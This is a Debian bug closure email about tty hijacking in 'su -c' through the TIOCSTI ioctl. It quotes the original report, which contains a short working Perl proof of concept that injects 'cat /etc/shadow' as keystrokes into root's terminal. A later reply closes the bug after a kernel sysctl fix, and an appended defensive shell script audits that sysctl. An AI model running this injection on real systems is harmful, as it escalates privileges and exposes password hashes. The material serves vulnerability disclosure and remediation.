Your message dated Fri, 2 Jan 2026 12:55:23 +0100
with message-id <[email protected]>
and subject line Re: Bug#905745: util-linux: tty hijacking possible in "su" via 
TIOCSTI ioctl
has caused the Debian Bug report #905745,
regarding util-linux: tty hijacking possible in "su" via TIOCSTI ioctl
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
905745: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=905745
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: login
Version: 1:4.1.4.2+svn3283-2+squeeze1
Severity: critical

After investigating why RedHat have a different behavior regarding "su -c" I
found out that there was a patch in RedHat to prevent tty hijacking when using
"su -c".

What makes the hijacking possible is that "su -c" still gives the command a
controlling tty, which means it has ioctl access to /dev/tty. This means it
can send things to the tty input buffer, which will be read just after su
ends.

The original report (with patch) on RedHat (from 2005?!?!?!) is:
https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=173008

A very simple exploit follows (Perl code)

____BEGIN_CODE____
#!/usr/bin/perl
require "sys/ioctl.ph";
open my $tty_fh, '<', '/dev/tty' or die $!;
foreach my $c (split //, 'cat /etc/shadow'.$/) {
    ioctl($tty_fh, &TIOCSTI, $c);
}
____END_CODE____

The scenario is:

Root runs a command as a less privileged user with "su -c". If the user was
compromised, the script will be able to run commands as root by injecting
keystrokes on the terminal.

-- System Information:
Debian Release: 6.0.1
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages login depends on:
ii  libc6                         2.11.2-10  Embedded GNU C Library: Shared lib
ii  libpam-modules                1.1.1-6.1  Pluggable Authentication Modules f
ii  libpam-runtime                1.1.1-6.1  Runtime support for the PAM librar
ii  libpam0g                      1.1.1-6.1  Pluggable Authentication Modules l

login recommends no packages.

login suggests no packages.

-- no debconf information



--- End Message ---
--- Begin Message ---
On Sun, Apr 30, 2023 at 06:14:37AM +0200, Salvatore Bonaccorso wrote:
> On Sat, Apr 29, 2023 at 11:47:40PM +0200, Chris Hofstaedtler wrote:
> > Dear Kernel Maintainers, Security Team,
> > 
> > * Sam Morris <[email protected]>:
> > > Linux 6.2 introduces a sysctl dev.tty.legacy_tiocsti which can be
> > > used to disable TIOCSTI. The default value of the sysctl is set at build
> > > time with CONFIG_LEGACY_TIOCSTI.
> > > 
> > > <https://cateee.net/lkddb/web-lkddb/LEGACY_TIOCSTI.html>
> > 
> > Maybe we can get this into 6.1?
> 
> (For the metainformation I'm assigning it back to su, where the CVE(s)
> originally got assigned, but we can close the bug in future once the
> root issue is addressed on kernel side, I hope you are okay with
> that).
> 
> It is unlikely we are going to enable this in bookworm, even if the
> change will be backported to 6.1.y, that is if the change would now be
> backported, I assume we will need to stick with the default being
> enabled. The time was too narrow before the
> freeze. But we have #1033095[1] for the corresponding bug on src:linux
> and to disable TIOCSTI early in the trixie development cycle by
> default (which comes automatically).
> 
>  [1]: https://bugs.debian.org/1033095
> 
> Hope this helps so far?

This landed in linux (6.3.2-1~exp1) experimental, and is thus fixed
in trixie and newer. Closing here.

Chris

--- End Message ---
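
Added example (not part of the bug thread, and not Debian's or the kernel's own tooling): a shell check for the dev.tty.legacy_tiocsti sysctl mentioned above, reporting whether TIOCSTI is off on the running kernel and whether a sysctl.d drop-in keeps it off after reboot. The function names, the output labels and the optional proc-root and config-directory arguments are assumptions, added so the check can be pointed at fixture files.

```shell
#!/bin/sh
# Added example: audit the dev.tty.legacy_tiocsti knob named in the thread.
# Function names and path arguments are illustrative assumptions.

# Runtime state. Prints: disabled | enabled | no-knob | unknown
tiocsti_runtime() {
    knob="${1:-/proc}/sys/dev/tty/legacy_tiocsti"
    # No file: the kernel predates the 6.2 sysctl, so TIOCSTI cannot be turned off.
    [ -e "$knob" ] || { echo "no-knob"; return 0; }
    case "$(cat "$knob" 2>/dev/null)" in
        0) echo "disabled" ;;
        1) echo "enabled" ;;
        *) echo "unknown" ;;
    esac
}

# Boot-time state from sysctl drop-ins. Prints: off | not-off | unset
# Conservative on purpose: any drop-in assigning a value other than 0 yields
# "not-off", so the result does not depend on file ordering rules.
tiocsti_persisted() {
    dir="${1:-/etc/sysctl.d}"
    key='dev[./]tty[./]legacy_tiocsti'
    values=$(cat "$dir"/*.conf 2>/dev/null |
        sed -n "s|^[[:space:]]*-\{0,1\}${key}[[:space:]]*=[[:space:]]*\([^[:space:]]*\).*$|\1|p" |
        sort -u)
    case "$values" in
        "") echo "unset" ;;
        0)  echo "off" ;;
        *)  echo "not-off" ;;
    esac
}

# Verdict: exit 0 only when TIOCSTI is off now and stays off after reboot.
tiocsti_audit() {
    runtime=$(tiocsti_runtime "${1:-}")
    boot=$(tiocsti_persisted "${2:-}")
    echo "runtime=$runtime boot=$boot"
    [ "$runtime" = "disabled" ] && [ "$boot" = "off" ]
}

# Usage: sh tiocsti_audit.sh [proc_root] [sysctl_dir]
tiocsti_audit "$@" || echo "TIOCSTI is not disabled both now and at boot"
```

A "no-knob" result means the running kernel is older than the 6.2 sysctl described in the thread, so the only remaining mitigations are on the su side.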